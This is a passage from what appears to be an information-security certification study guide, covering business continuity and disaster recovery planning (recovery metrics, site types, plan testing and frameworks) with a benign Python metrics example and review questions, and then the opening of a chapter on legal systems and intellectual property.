Project Initiation

In order to develop the BCP/DRP, the scope of the project must be determined and agreed upon.

Fast Facts
Project Initiation involves seven distinct milestones as listed below:
1. Develop the contingency planning policy statement: A formal department or agency policy provides the authority and guidance necessary to develop an effective contingency plan.
2. Conduct the business impact analysis (BIA): The BIA helps to identify and prioritize critical IT systems and components. A template for developing the BIA is also provided to assist the user.
3. Identify preventive controls: Measures taken to reduce the effects of system disruptions can increase system availability and reduce contingency life cycle costs.
4. Develop recovery strategies: Thorough recovery strategies ensure that the system may be recovered quickly and effectively following a disruption.
5. Develop an IT contingency plan: The contingency plan should contain detailed guidance and procedures for restoring a damaged system.
6. Plan testing, training, and exercises: Testing the plan identifies planning gaps, whereas training prepares recovery personnel for plan activation; both activities improve plan effectiveness and overall agency preparedness.
7. Plan maintenance: The plan should be a living document that is updated regularly to remain current with system enhancements.

Assessing the critical state

Assessing the critical state can be difficult because determining which pieces of the IT infrastructure are critical depends solely on how it supports the users within the organization. For example, without consulting all of the users, a simple mapping program may not seem to be a critical asset for an organization. However, if there is a user group that drives trucks and makes deliveries for business purposes, this mapping software may be critical for them to schedule pickups and deliveries.
Conduct Business Impact Analysis

The Business Impact Analysis (BIA) is the formal method for determining how a disruption to the IT system(s) of an organization will impact the organization's requirements, processes, and interdependencies with respect to the business mission. It is an analysis to identify and prioritize critical IT systems and components. It enables the BCP/DRP project manager to fully characterize the IT contingency requirements and priorities. The objective is to correlate the IT system components with the critical service it supports. It also aims to quantify the consequence of a disruption to the system component and how that will affect the organization. The primary goal of the BIA is to determine the Maximum Tolerable Downtime (MTD) for a specific IT asset. This will directly impact what disaster recovery solution is chosen.

Identify critical assets

The critical asset list is a list of those IT assets that are deemed business essential by the organization. These systems' DRP/BCP must have the best available recovery capabilities assigned to them.

Conduct BCP/DRP-focused risk assessment

The BCP/DRP-focused risk assessment determines what risks are inherent to which IT assets. A vulnerability analysis is also conducted for each IT system and major application. This is done because most traditional BCP/DRP evaluations focus on physical security threats, both natural and human.

Determine Maximum Tolerable Downtime

The primary goal of the BIA is to determine the Maximum Tolerable Downtime (MTD), which describes the total time a system can be inoperable before an organization is severely impacted. It is the maximum time it takes to execute the reconstitution phase. Reconstitution is the process of moving an organization from the disaster recovery to business operations.

Maximum Tolerable Downtime is composed of two metrics: the Recovery Time Objective (RTO) and the Work Recovery Time (WRT); see below.

Alternate terms for MTD

Depending on the business continuity framework that is used, other terms may be substituted for Maximum Tolerable Downtime. These include Maximum Allowable Downtime (MAD), Maximum Tolerable Outage (MTO), and Maximum Acceptable Outage (MAO).

Failure and recovery metrics

A number of metrics are used to quantify how frequently systems fail, how long a system may exist in a failed state, and the maximum time to recover from failure. These metrics include the Recovery Point Objective (RPO), Recovery Time Objective (RTO), Work Recovery Time (WRT), Mean Time Between Failures (MTBF), Mean Time to Repair (MTTR), and Minimum Operating Requirements (MOR).

Recovery Point Objective

The Recovery Point Objective (RPO) is the amount of data loss or system inaccessibility (measured in time) that an organization can withstand. If you perform weekly backups, someone made a decision that your company could tolerate the loss of a week's worth of data. If backups are performed on Saturday evenings and a system fails on Saturday afternoon, you have lost the entire week's worth of data. This is the Recovery Point Objective. In this case, the RPO is 1 week.

The RPO represents the maximum acceptable amount of data/work loss for a given process because of a disaster or disruptive event.

Recovery Time Objective and Work Recovery Time

The Recovery Time Objective (RTO) describes the maximum time allowed to recover business or IT systems. RTO is also called the systems recovery time. This is one part of Maximum Tolerable Downtime: once the system is physically running, it must be configured.

Crunch Time
Work Recovery Time (WRT) describes the time required to configure a recovered system. Downtime consists of two elements, the systems recovery time and the work recovery time. Therefore, MTD = RTO + WRT.
Mean Time Between Failures

Mean Time Between Failures (MTBF) quantifies how long a new or repaired system will run before failing. It is typically generated by a component vendor and is largely applicable to hardware as opposed to applications and software.

Mean Time to Repair

The Mean Time to Repair (MTTR) describes how long it will take to recover a specific failed system. It is the best estimate for reconstituting the IT system so that business continuity may occur.

Minimum Operating Requirements

Minimum Operating Requirements (MOR) describe the minimum environmental and connectivity requirements in order to operate computer equipment. It is important to determine and document what the MOR is for each IT critical asset because, in the event of a disruptive event or disaster, proper analysis can be conducted quickly to determine if the IT assets will be able to function in the emergency environment.

Identify Preventive Controls

Preventive controls prevent disruptive events from having an impact. For example, as stated in Chapter 10, Domain 10: Physical (Environmental) Security, HVAC systems are designed to prevent computer equipment from overheating and failing.

Did You Know?
The BIA will identify some risks that may be mitigated immediately. This is another advantage of performing BCP/DRP, including the BIA: it improves your security, even if no disaster occurs.

Recovery strategy

Once the BIA is complete, the BCP team knows the Maximum Tolerable Downtime. This metric, as well as others including the Recovery Point Objective and Recovery Time Objective, is used to determine the recovery strategy. A cold site cannot be used if the MTD is 12 hours, for example. As a general rule, the shorter the MTD, the more expensive the recovery solution will be.

Redundant site

A redundant site is an exact production duplicate of a system that has the capability to seamlessly operate all necessary IT operations without loss of services to the end user of the system. A redundant site receives data backups in real time so that in the event of a disaster, the users of the system have no loss of data. It is a building configured exactly like the primary site and is the most expensive recovery option because it effectively more than doubles the cost of IT operations. To be fully redundant, a site must have real-time data backups to the production system, and the end user should not notice any difference in IT services or operations in the event of a disruptive event.

Hot site

A hot site is a location that an organization may relocate to following a major disruption or disaster. It is a data center with a raised floor, power, utilities, computer peripherals, and fully configured computers. The hot site will have all necessary hardware and critical applications data mirrored in real time. A hot site will have the capability to allow the organization to resume critical operations within a very short period of time, sometimes in less than an hour.

It is important to note the difference between a hot and redundant site. Hot sites can quickly recover critical IT functionality; it may even be measured in minutes instead of hours. However, a redundant site will appear as operating normally to the end user no matter what the state of operations is for the IT program. A hot site has all the same physical, technical, and administrative controls implemented as the production site.

Warm site

A warm site has some aspects of a hot site, for example, readily accessible hardware and connectivity, but it will have to rely upon backup data in order to reconstitute a system after a disruption. It is a data center with a raised floor, power, utilities, computer peripherals, and fully configured computers.

Cold site

A cold site is the least expensive recovery solution to implement. It does not include backup copies of data, nor does it contain any immediately available hardware. After a disruptive event, a cold site will take the longest amount of time of all recovery solutions to implement and restore critical IT services for the organization. Especially in a disaster area, it could take weeks to get vendor hardware shipments in place, so organizations using a cold site recovery solution will have to be able to withstand a significantly long MTD. A cold site is typically a data center with a raised floor, power, utilities, and physical security, but not much beyond that.

Reciprocal agreement

Reciprocal agreements are a bidirectional agreement between two organizations in which one organization promises another organization that it can move in and share space if it experiences a disaster. It is documented in the form of a contract written to gain support from outside organizations in the event of a disaster. They are also referred to as Mutual Aid Agreements (MAAs), and they are structured so that each organization will assist the other in the event of an emergency.

Mobile site

Mobile sites are data centers on wheels: towable trailers that contain racks of computer equipment, as well as HVAC, fire suppression, and physical security. They are a good fit for disasters such as a data center flood, where the data center is damaged but the rest of the facility and surrounding property are intact. They may be towed on site, supplied power and network, and brought online.
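As an added example (not code from the study guide or from NIST SP 800-34), the Python below ties the metrics above together: it derives the RTO budget from MTD = RTO + WRT, picks the cheapest site tier whose recovery time fits that budget, and computes the data actually lost in the Saturday-backup scenario against the RPO. The per-site recovery hours, the two assets and the backup schedule are constructed illustration values, not figures from the book.

```python
"""Recovery-metric checks for a BCP/DRP business impact analysis (BIA).

Added example, not from the study guide or NIST SP 800-34. The per-site
recovery times, the asset values and the backup schedule are constructed
sample data; they illustrate MTD = RTO + WRT and the relationship between
the backup interval and the Recovery Point Objective (RPO).
"""
from dataclasses import dataclass
from datetime import datetime
from typing import List, Optional

# Approximate hours each recovery option needs before systems are physically
# running again, ordered from most to least expensive as in the text.
# Constructed illustration values, not figures from the book.
SITE_RECOVERY_HOURS = [
    ("redundant", 0.0),     # real-time mirror; end users notice no outage
    ("hot", 1.0),           # hardware and mirrored data ready, "less than an hour"
    ("warm", 24.0),         # hardware ready, but data restored from backup
    ("cold", 24.0 * 14),    # facility only; vendor hardware "could take weeks"
]


@dataclass
class Asset:
    """One critical IT asset with the metrics the BIA produces for it."""
    name: str
    mtd_hours: float       # Maximum Tolerable Downtime from the BIA
    wrt_hours: float       # Work Recovery Time: configuring the recovered system
    rpo_hours: float       # Recovery Point Objective: tolerable data loss, in time

    @property
    def rto_budget_hours(self) -> float:
        """Since MTD = RTO + WRT, the time available to get the system
        physically running again is RTO = MTD - WRT."""
        return self.mtd_hours - self.wrt_hours


def cheapest_site_meeting_rto(asset: Asset) -> Optional[str]:
    """Return the least expensive recovery option whose recovery time fits the
    asset's RTO budget, or None if even a redundant site cannot meet it
    (e.g. a negative budget because WRT alone exceeds the MTD)."""
    fitting = [name for name, hours in SITE_RECOVERY_HOURS
               if hours <= asset.rto_budget_hours]
    return fitting[-1] if fitting else None   # later entries are cheaper


def hours_of_data_lost(failure: datetime, backups: List[datetime]) -> float:
    """Data lost (in hours of work) when a system fails at `failure`, given
    the times at which backups completed. Only backups taken before the
    failure can be restored; as the text notes, failing just before the next
    weekly backup loses the entire week."""
    prior = [b for b in backups if b <= failure]
    if not prior:
        raise ValueError("no backup predates the failure; all data is lost")
    return (failure - max(prior)).total_seconds() / 3600.0


def rpo_met(asset: Asset, failure: datetime, backups: List[datetime]) -> bool:
    """True when the data actually lost at `failure` stays within the RPO."""
    return hours_of_data_lost(failure, backups) <= asset.rpo_hours


# --- constructed sample data -------------------------------------------------
# The delivery-scheduling mapping software from the text, treated as critical.
MAPPING = Asset("delivery mapping software", mtd_hours=12.0, wrt_hours=2.0,
                rpo_hours=24.0)
# A low-priority archive system that can tolerate weeks of downtime.
ARCHIVE = Asset("document archive", mtd_hours=24.0 * 21, wrt_hours=8.0,
                rpo_hours=24.0 * 7)

# Weekly backups on Saturday evenings (20:00) during June 2013 (constructed).
WEEKLY_BACKUPS = [datetime(2013, 6, d, 20, 0) for d in (1, 8, 15, 22, 29)]
# Failure on Saturday afternoon, hours before the next backup would have run.
SATURDAY_AFTERNOON_FAILURE = datetime(2013, 6, 29, 15, 0)


if __name__ == "__main__":
    for asset in (MAPPING, ARCHIVE):
        print(f"{asset.name}: MTD {asset.mtd_hours}h, RTO budget "
              f"{asset.rto_budget_hours}h -> {cheapest_site_meeting_rto(asset)} site")
    lost = hours_of_data_lost(SATURDAY_AFTERNOON_FAILURE, WEEKLY_BACKUPS)
    print(f"data lost: {lost:.0f}h; RPO of {MAPPING.rpo_hours}h met: "
          f"{rpo_met(MAPPING, SATURDAY_AFTERNOON_FAILURE, WEEKLY_BACKUPS)}")
```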
Related plans

As discussed previously, the Business Continuity Plan is an umbrella plan that contains other plans. In addition to the Disaster Recovery Plan, other plans include the Continuity of Operations Plan (COOP), the Business Resumption/Recovery Plan (BRP), Continuity of Support Plan, Cyber Incident Response Plan, Occupant Emergency Plan (OEP), and the Crisis Management Plan (CMP). Table 8.2, from NIST Special Publication 800-34, summarizes these plans.

Table 8.2
Summary of BCP Plans from NIST SP 800-34
(Source: NIST SP 800-34.)

Call Trees

A key tool leveraged for staff communication by the Crisis Communications Plan is the Call Tree, which is used to quickly communicate news throughout an organization without overburdening any specific person. The Call Tree works by assigning each employee a small number of other employees they are responsible for calling in an emergency event. For example, the organization president may notify executive leadership of an emergency situation and they, in turn, will notify their top-tier managers. The top-tier managers will then call the people they have been assigned to call. The Call Tree continues until all affected personnel have been contacted.

DRP TESTING AND TRAINING

Testing, training, and awareness must be performed for the disaster portion of a BCP/DRP. Skipping these steps is one of the most common BCP/DRP mistakes. Some organizations complete their DRP and then consider the matter resolved and put the big DRP binder on a shelf to collect dust. This proposition is wrong on numerous levels.

First, a DRP is never complete, but is rather a continually amended method for ensuring the ability for the organization to recover in an acceptable manner. Second, while well-meaning individuals carry out the creation and update of a DRP, even the most diligent of administrators will make mistakes. To find and correct these issues prior to their hindering recovery in an actual disaster, testing must be carried out on a regular basis. Third, any DRP that will be effective will have some inherent complex operations and maneuvers to be performed by administrators. There will always be unexpected occurrences during disasters, but each member of the DRP should be exceedingly familiar with the particulars of their role in a DRP, which is a call for training on the process.

Finally, awareness of the general user's role in the DRP, as well as awareness of the organization's emphasis on ensuring the safety of personnel and business operations in the event of a disaster, is imperative. This section will provide details on steps to effectively test, train, and build awareness for the organization's DRP.
DRP testing

In order to ensure that a Disaster Recovery Plan represents a viable plan for recovery, thorough testing is needed. Given the DRP's detailed tactical subject matter, it should come as no surprise that routine infrastructure, hardware, software, and configuration changes will alter the way the DRP needs to be carried out. Organizations' information systems are in a constant state of flux, but unfortunately, many of these changes do not readily make their way into an updated DRP. To ensure both the initial and continued efficacy of the DRP as a feasible recovery methodology, testing needs to be performed.
DRP review

The DRP review is the most basic form of initial DRP testing and is focused on simply reading the DRP in its entirety to ensure completeness of coverage. This review is typically to be performed by the team that developed the plan and will involve team members reading the plan in its entirety to quickly review the overall plan for any obvious flaws. The DRP review is primarily just a sanity check to ensure that there are no glaring omissions in coverage or fundamental shortcomings in the approach.

Checklist

Checklist (also known as consistency) testing lists all necessary components required for successful recovery and ensures that they are, or will be, readily available should a disaster occur. For example, if the disaster recovery plan calls for the reconstitution of systems from tape backups at an alternate computing facility, does the site in question have an adequate number of tape drives on hand to carry out the recovery in the indicated window of time? The checklist test is often performed concurrently with the structured walk-through or tabletop testing as a solid first testing threshold. The checklist test is focused on ensuring that the organization has, or can acquire in a timely fashion, a sufficient level of resources on which their successful recovery is dependent.

Structured walk-through/tabletop

Another test that is commonly completed at the same time as the checklist test is that of the structured walk-through, which is also often referred to as a tabletop exercise. During this type of DRP test, usually performed prior to more in-depth testing, the goal is to allow individuals who are knowledgeable about the systems and services targeted for recovery to thoroughly review the overall approach. The term structured walk-through is illustrative, as the group will talk through the proposed recovery procedures in a structured manner to determine whether there are any noticeable omissions, gaps, erroneous assumptions, or simply technical missteps that would hinder the recovery process from successfully occurring.

Simulation test/walk-through drill

A simulation test, also called a walk-through drill (not to be confused with the discussion-based structured walk-through), goes beyond talking about the process and actually has teams carry out the recovery process. A pretend disaster is simulated to which the team must respond as they are directed to by the DRP. The scope of simulations will vary significantly and tend to grow to be more complicated and involve more systems, as smaller disaster simulations are successfully managed. Though some will see the goal as being able to successfully recover the systems impacted by the simulation, ultimately, the goal of any testing of a DRP is to help ensure that the organization is well prepared in the event of an actual disaster.

Parallel processing

Another type of DRP test is that of parallel processing. This type of test is common in environments where transactional data is a key component of the critical business processing. Typically, this test will involve recovery of critical processing components at an alternate computing facility and then restoring data from a previous backup. Note that regular production systems are not interrupted.

Partial and complete business interruption

Arguably, the most high-fidelity of all DRP tests involves business interruption testing. However, this type of test can actually be the cause of a disaster, so extreme caution should be exercised before attempting an actual interruption test. As the name implies, the business interruption style of testing will have the organization actually stop processing normal business at the primary location and will instead leverage the alternate computing facility. These types of tests are more common in organizations where fully redundant, often load-balanced, operations already exist.
Training

Although there is an element of DRP training that comes as part of performing the tests discussed above, there is certainly a need for more detailed training on some specific elements of the DRP process. Another aspect of training is to ensure adequate representation on staff of those trained in basic first aid and CPR.

Starting emergency power

Though it might seem simple, converting a data center to emergency power, such as backup generators that will begin taking the load as the UPS fail, is not to be taken lightly. Specific training and testing of changing over to emergency power should be regularly performed.

Calling tree training/test

Another example of combination training and testing is in regard to calling trees, which were discussed previously in Section Call Trees. The hierarchical relationships of calling trees can make outages in the tree problematic. Individuals with calling responsibilities are typically expected to be able to answer within a very short time period or otherwise make arrangements.

CONTINUED BCP/DRP MAINTENANCE

Once the initial BCP/DRP is completed, tested, trained, and implemented, it must be kept up to date. Business and IT systems change quickly, and IT professionals are accustomed to adapting to that change. BCP/DRPs must keep pace with all critical business and IT changes.

Change management

Change management includes tracking and documenting all planned changes, formal approval for substantial changes, and documentation of the results of the completed change. All changes must be auditable.

Crunch Time
The BCP team should be a member of the change control board and attend all meetings. The goal of the BCP team's involvement on the change control board is to identify any changes that must be addressed by the BCP/DRP.

BCP/DRP mistakes

Business continuity and disaster recovery planning is a business's last line of defense against failure. If other controls have failed, BCP/DRP is the final control. If it fails, the business may fail.

The success of BCP/DRP is critical, but many plans fail. The BCP team should consider the failure of other organizations' plans and view their own under intense scrutiny. They should ask themselves this question: Have we made mistakes that threaten the success of our plan?

Fast Facts
Common BCP/DRP mistakes include:
- Lack of management support
- Lack of business unit involvement
- Lack of prioritization among critical staff
- Improper (often overly narrow) scope
- Inadequate telecommunications management
- Inadequate supply chain management
- Incomplete or inadequate crisis management plan
- Lack of testing
- Lack of training and awareness
- Failure to keep the BCP/DRP up to date

SPECIFIC BCP/DRP FRAMEWORKS

Given the patchwork of overlapping terms and processes used by various BCP/DRP frameworks, this chapter focuses on universal best practices, without attempting to map to a number of different (and sometimes inconsistent) terms and processes described by various BCP/DRP frameworks.

NIST SP 800-34

The National Institute of Standards and Technology (NIST) Special Publication 800-34 Rev. 1, Contingency Planning Guide for Federal Information Systems, may be downloaded at http://csrc.nist.gov/publications/nistpubs/800-34-rev1/sp800-34-rev1_errata-Nov11-2010.pdf. The document is high quality and public domain. Plans can sometimes be significantly improved by referencing SP 800-34 when writing or updating a BCP/DRP.

ISO/IEC 27031

ISO/IEC 27031 is part of the ISO 27000 series, which also includes ISO 27001 and ISO 27002 (discussed in Chapter 1, Domain 1: Information Security Governance and Risk Management). ISO/IEC 27031 focuses on BCP (DRP is handled by another framework; see below).

Fast Facts
According to http://www.iso27001security.com/html/27031.html, ISO/IEC 27031 is designed to:
- Provide a framework (methods and processes) for any organization, private, governmental, and non-governmental
- Identify and specify all relevant aspects including performance criteria, design, and implementation details, for improving ICT readiness as part of the organization's ISMS, helping to ensure business continuity.
- Enable an organization to measure its continuity, security and hence readiness to survive a disaster in a consistent and recognized manner.

Terms and acronyms used by ISO/IEC 27031 include:
- ICT: Information and Communications Technology
- ISMS: Information Security Management System

(Source: ISO/IEC 27031 Information technology, Security techniques, Guidelines for ICT Readiness for Business Continuity (final committee draft). http://www.iso27001security.com/html/27031.html [accessed July 2, 2013].)

A separate ISO plan for disaster recovery is ISO/IEC 24762:2008, Information technology, Security techniques, Guidelines for information and communications technology disaster recovery services. More information is available at http://www.iso.org/iso/catalogue_detail.htm?csnumber=41532.

BCI

The Business Continuity Institute (BCI, http://www.thebci.org/) published a six-step Good Practice Guidelines (GPG) in 2008 that describes the Business Continuity Management (BCM) process:
- Section 1 consists of the introductory information plus BCM Policy and Programme Management.
- Section 2 is Understanding the Organisation
- Section 3 is Determining BCM Strategy
- Section 4 is Developing and Implementing BCM Response
- Section 5 is Exercising, Maintaining & Reviewing BCM arrangements
- Section 6 is Embedding BCM in the Organisation's Culture

Summary of exam objectives

Business Continuity and Disaster Recovery Planning is a critical, and frequently overlooked, domain. It can be the most critical of all domains and serve as an organization's last control to prevent failure. Of all controls, a failed BCP or DRP can be most devastating, potentially resulting in organizational failure or injury or loss of life.

Beyond mitigating such stark risks, Business Continuity and Disaster Recovery Planning has evolved to provide true business value to organizations, even in the absence of disaster. The organizational diligence required to build a comprehensive BCP/DRP can pay many dividends, through the thorough understanding of key business processes, asset tracking, prudent backup and recovery strategies, and the use of standards. Mapping risk to key business processes can result in preventive risk measures taken in advance of any disaster, a process that may avoid future disasters entirely.

TOP FIVE TOUGHEST QUESTIONS

1. Which plan details the steps required to restore normal business operations after recovering from a disruptive event?
A. Business Continuity Planning (BCP)
B. Business Resumption Planning (BRP)
C. Continuity of Operations Plan (COOP)
D. Occupant Emergency Plan (OEP)
2. What metric describes how long it will take to recover a failed system?
A. Minimum Operating Requirements (MOR)
B. Mean Time Between Failures (MTBF)
C. The Mean Time to Repair (MTTR)
D. Recovery Point Objective (RPO)
3. What metric describes the moment in time in which data must be recovered and made available to users in order to resume business operations?
A. Mean Time Between Failures (MTBF)
B. The Mean Time to Repair (MTTR)
C. Recovery Point Objective (RPO)
D. Recovery Time Objective (RTO)
4. Maximum Tolerable Downtime (MTD) is composed of which two metrics?
A. Recovery Point Objective (RPO) and Work Recovery Time (WRT)
B. Recovery Point Objective (RPO) and Mean Time to Repair (MTTR)
C. Recovery Time Objective (RTO) and Work Recovery Time (WRT)
D. Recovery Time Objective (RTO) and Mean Time to Repair (MTTR)
5. Which draft business continuity guideline ensures business continuity of the Information and Communications Technology (ICT) as part of the organization's Information Security Management System (ISMS)?
A. BCI
B. BS 7799
C. ISO/IEC 27031
D. NIST Special Publication 800-34

ANSWERS
1. Correct answer and explanation: B. Answer B is correct. Business Resumption Planning details the steps required to restore normal business operations after recovering from a disruptive event.
Incorrect answers and explanations: A, C, and D. Answers A, C, and D are incorrect. Business Continuity Planning develops a long-term plan to ensure the continuity of business operations. The Continuity of Operations Plan describes the procedures required to maintain operations during a disaster. The Occupant Emergency Plan provides the response procedures for occupants of a facility in the event a situation poses a threat to the health and safety of personnel, the environment, or property.
2. Correct answer and explanation: C. Answer C is correct. The Mean Time to Repair (MTTR) describes how long it will take to recover a failed system. It is the best estimate for reconstituting the IT system so that business continuity may occur.
Incorrect answers and explanations: A, B, and D. Answers A, B, and D are incorrect. Minimum Operating Requirements describe the minimum environmental and connectivity requirements in order to operate computer equipment. Mean Time Between Failures quantifies how long a new or repaired system will run before failing. The Recovery Point Objective (RPO) is the moment in time in which data must be recovered and made available to users in order to resume business operations.
3. Correct answer and explanation: C. Answer C is correct. The Recovery Point Objective (RPO) is the moment in time in which data must be recovered and made available to users in order to resume business operations.
Incorrect answers and explanations: A, B, and D. Answers A, B, and D are incorrect. Mean Time Between Failures quantifies how long a new or repaired system will run before failing. Mean Time to Repair describes how long it will take to recover a failed system. Recovery Time Objective describes the maximum time allowed to recover business or IT systems.
4. Correct answer and explanation: C. Answer C is correct. The Recovery Time Objective (RTO, the time it takes to bring a failed system back online) and Work Recovery Time (WRT, the time required to configure a failed system) are used to calculate the Maximum Tolerable Downtime. RTO + WRT = MTD.
Incorrect answers and explanations: A, B, and D. Answers A, B, and D are incorrect. Maximum Tolerable Downtime does not directly use Recovery Point Objective or Mean Time to Repair as metrics.
5. Correct answer and explanation: C. Answer C is correct. The ISO/IEC 27031 guideline ensures business continuity of the Information and Communications Technology (ICT) as part of the organization's Information Security Management System (ISMS).
Incorrect answers and explanations: A, B, and D. Answers A, B, and D are incorrect. BCI and NIST Special Publication 800-34 are business continuity frameworks, but do not match the terms in the question. BS 7799 is not BCP/DRP focused: it describes information security management's best practices.
Swanson, M., Wohl, A., Pope, L., Grance, T., Hash, J., Thomas, R. NIST SP 800-34 Contingency Planning Guide for Information Technology Systems.

Understanding security risk management: Recovery time requirements. http://searchsecuritychannel.techtarget.com/generic/0,295582,sid97_gci1268749,00.html [accessed July 2, 2013].

Business Continuity Management GOOD PRACTICE GUIDELINES 2008. http://www.calamityprevention.com/links/GPG_2008 [accessed July 2, 2013].

CHAPTER 9

Domain 9: Legal, Regulations, Investigations, and Compliance

Abstract
This chapter reviews the key topics found in Domain 9: Legal, Regulations, Investigations, and Compliance. Important legal topics presented in this chapter include major legal systems, a discussion of criminal versus civil law, and intellectual property. Digital forensics and evidence as they relate to computer cases are also discussed. The final key element of this chapter is a presentation on ethics and, most importantly, a discussion of the (ISC)2 Code of Ethics.

KEYWORDS
Civil law; Criminal law; Administrative law; Religious law; Common law; Patent; Copyright; Trademark; Trade Secret; Entrapment; Enticement; Due care; Due Diligence; Hearsay

Exam Objectives in This Chapter

- Major Legal Systems
- Criminal, Civil, and Administrative Law
- Information Security Aspects of Law
- Legal Aspects of Investigations
- Privacy, Important Laws, and Regulations
- Forensics
- Security and Third Parties
- Ethics

Introduction
This chapter will introduce some of the basic concepts that are important to all information security professionals. The actual implementation of laws surrounding intellectual property, privacy, reasonable searches, and breach notification, to name a few, will differ among various regions of the world, but the importance of these concepts is still universal.

MAJOR LEGAL SYSTEMS

In order to begin to appreciate common legal concepts at work in today's global economy, an understanding of the major legal systems is required. These legal systems provide the framework that determines how a country develops laws pertaining to information systems in the first place. The three major systems of law are civil, common, and religious law.

Civil law (legal system)

The most common of the major legal systems is civil law, which many countries throughout the world employ. The system of civil law leverages codified laws or statutes to determine what is considered within the bounds of law. Though a legislative branch typically wields the power to create laws, there will still exist a judicial branch that is tasked with interpretation of the existing laws. The most significant difference between civil and common law is that, under civil law, judicial precedents and particular case rulings do not carry the weight they do under common law.

Common law

Common law is the legal system used in the United States, Canada, the United Kingdom, and most former British colonies, among others. The primary distinguishing feature of common law is the significant emphasis on particular cases and judicial precedents as determinants of laws. Though there is typically also a legislative body tasked with the creation of new statutes and laws, judicial rulings can, at times, supersede those laws. Because of the emphasis on judges' interpretations, there is significant possibility that as society changes over time, so too can judicial interpretations change in kind.

Religious and customary law

Religious law serves as the third of the major legal systems. Religious doctrine or interpretation serves as a source of legal understanding and statutes. While Christianity, Judaism, and Hinduism have all had significant influence on national legal systems, Islam serves as the most common source for religious legal systems. Sharia is an example of Islamic law that uses the Qur'an and Hadith as its foundation.

Customary law refers to those customs or practices that are so commonly accepted by a group that the custom is treated as a law. These practices can be later codified as laws in the more traditional sense, but the emphasis on prevailing acceptance of a group is quite important with respect to the concept of negligence, which, in turn, is important in information security.

CRIMINAL, CIVIL, AND ADMINISTRATIVE LAW

Within common law, there are various branches of laws, including criminal, civil, and administrative law.

Criminal law

Criminal law pertains to those laws where the victim can be seen as society itself. While it might seem odd to consider society the victim when an individual is murdered, the goal of criminal law is to promote and maintain an orderly and law-abiding citizenry. Criminal law can include penalties that remove an individual from society by incarceration or, in some extreme cases in some regions, death. The goals of criminal law are to deter crime and to punish offenders.

Due to the seriousness of potentially depriving someone of either their freedom or, in the most extreme cases, his or her life, the burden of proof in criminal cases is beyond any reasonable doubt.

Civil law

In addition to civil law being a major legal system in the world, it also serves as a type of law within the common law legal system. Another term associated with civil law is tort law, which deals with injury, loosely defined, that results from someone violating their responsibility to provide a duty of care. Tort law is the primary component of civil law and is the most significant source of lawsuits seeking financial damages.

In the United States, the burden of proof in a criminal court is beyond a reasonable doubt, while the burden of proof in civil proceedings is the preponderance of the evidence. Preponderance means it is more likely than not. Satisfying the burden of proof requirement of the preponderance of the evidence in a civil matter is a much easier task than meeting the burden of proof requirement in criminal proceedings. The most common types of financial damages are presented in Table 9.1.
Table 9.1
Common Types of Financial Damages

Financial Damages: Description
Statutory: Statutory damages are those prescribed by law, which can be awarded to the victim even if the victim incurred no actual loss or injury.
Compensatory: Compensatory damages provide the victim with a financial award in an effort to compensate for the loss or injury incurred as a direct result of the wrongdoing.
Punitive: Punitive damages punish an individual or organization. These damages are typically awarded to attempt to discourage a particularly egregious violation where the compensatory or statutory damages alone would not act as a deterrent.

Administrative law

Administrative law or regulatory law is law enacted by government agencies. The executive branch (deriving from the Office of the President) enacts administrative law in the United States. Government-mandated compliance measures are administrative laws.

The executive branch can create administrative law without requiring input from the legislative branch, but the law must still operate within the confines of the civil and criminal code and can still come under scrutiny by the judicial branch. Some examples of administrative law are FCC regulations, HIPAA Security mandates, FDA regulations, and FAA regulations.

INFORMATION SECURITY ASPECTS OF LAW

Examples of legal concepts affecting information security include: crimes being committed or aided by computer systems, attacks on intellectual property, and international issues.

Computer crime

One aspect of the interaction of information security and the legal system is that of computer crimes. Applicable computer crime laws vary throughout the world, according to jurisdiction. However, regardless of region, some generalities exist.

Fast Facts
Computer crimes can be based upon the way in which computer systems relate to the wrongdoing: computer systems as targets and computer systems as a tool to perpetrate the crime.
- Computer systems as target: Crimes where the computer systems serve as a primary target, such as: disrupting online commerce by means of Distributed Denial of Service attacks, installing malware on systems for the distribution of spam, or exploiting vulnerability on a system to leverage it to store illegal content.
- Computer as a tool: Crimes where the computer is a central component enabling the commission of the crime. Examples include: stealing trade secrets by compromising a database server, leveraging computers to steal cardholder data from payment systems, conducting computer-based reconnaissance to target an individual for information disclosure or espionage, and using computer systems for the purposes of harassment.

International cooperation

To date, the most significant progress toward international cooperation in computer crime policy is the Council of Europe Convention on Cybercrime. In addition to the treaty being signed and subsequently ratified by a majority of the 47 European member countries, the United States has also signed and ratified the treaty. The primary focus of the Convention on Cybercrime is establishing standards in cybercrime policy to promote international cooperation during the investigation and prosecution of cybercrime. Additional information on the Council of Europe Convention on Cybercrime can be found here: http://conventions.coe.int/Treaty/en/Treaties/Html/185.htm.

Intellectual property

As opposed to physical or tangible property, intellectual property refers to intangible property that resulted from a creative act. The purpose of intellectual property law is to control the use of intangible property that can often be trivial to reproduce or abuse once made public or known. The following intellectual property concepts effectively create an exclusive monopoly on their use.
Trademark

Trademarks are associated with marketing: the purpose is to allow for the creation of a brand that distinguishes the source of products or services. A distinguishing name, logo, symbol, or image represents the most commonly trademarked items. In the United States, two different symbols are used with distinctive marks that an individual or organization is intending to protect. The superscript TM symbol can be used freely to indicate an unregistered mark and is shown in Figure 9.1. The circled R symbol is used with marks that have been formally registered as a trademark with the US Patent and Trademark Office and is shown in Figure 9.2.

Figure 9.1 Trademark symbol.

Figure 9.2 Registered trademark symbol.

Patent

Patents provide a monopoly to the patent holder on the right to use, make, or sell an invention for a period of time in exchange for the patent holder making the invention public. During the life of the patent, the patent holder can, through the use of civil litigation, exclude others from leveraging the patented invention. In order for an invention to be patented, it must be novel and non-obvious (in European terms, it must involve an inventive step). The length that a patent is valid (the patent term) varies throughout the world and also by the type of invention being patented. Generally, in both Europe and the United States, the patent term is 20 years from the initial filing date.
Copyright

Copyright represents a type of intellectual property that protects the form of expression in artistic, musical, or literary works and is typically denoted by the circled C symbol as shown in Figure 9.3. The purpose of copyright is to preclude unauthorized duplication, distribution, or modification of a creative work. Note that the form of expression is protected rather than the subject matter or ideas represented.

Figure 9.3 Copyright symbol.

Licenses

Software licenses are a contract between a provider of software and the consumer. Though there are licenses that provide explicit permission for the consumer to do virtually anything with the software, including modifying it for use in another commercial product, most commercial software licensing provides explicit limits on the use and distribution of the software. Software licenses such as end user license agreements (EULAs) are an unusual form of contract because using the software typically constitutes contractual agreement, even though only a small minority of users actually read the lengthy EULA.
Trade secrets

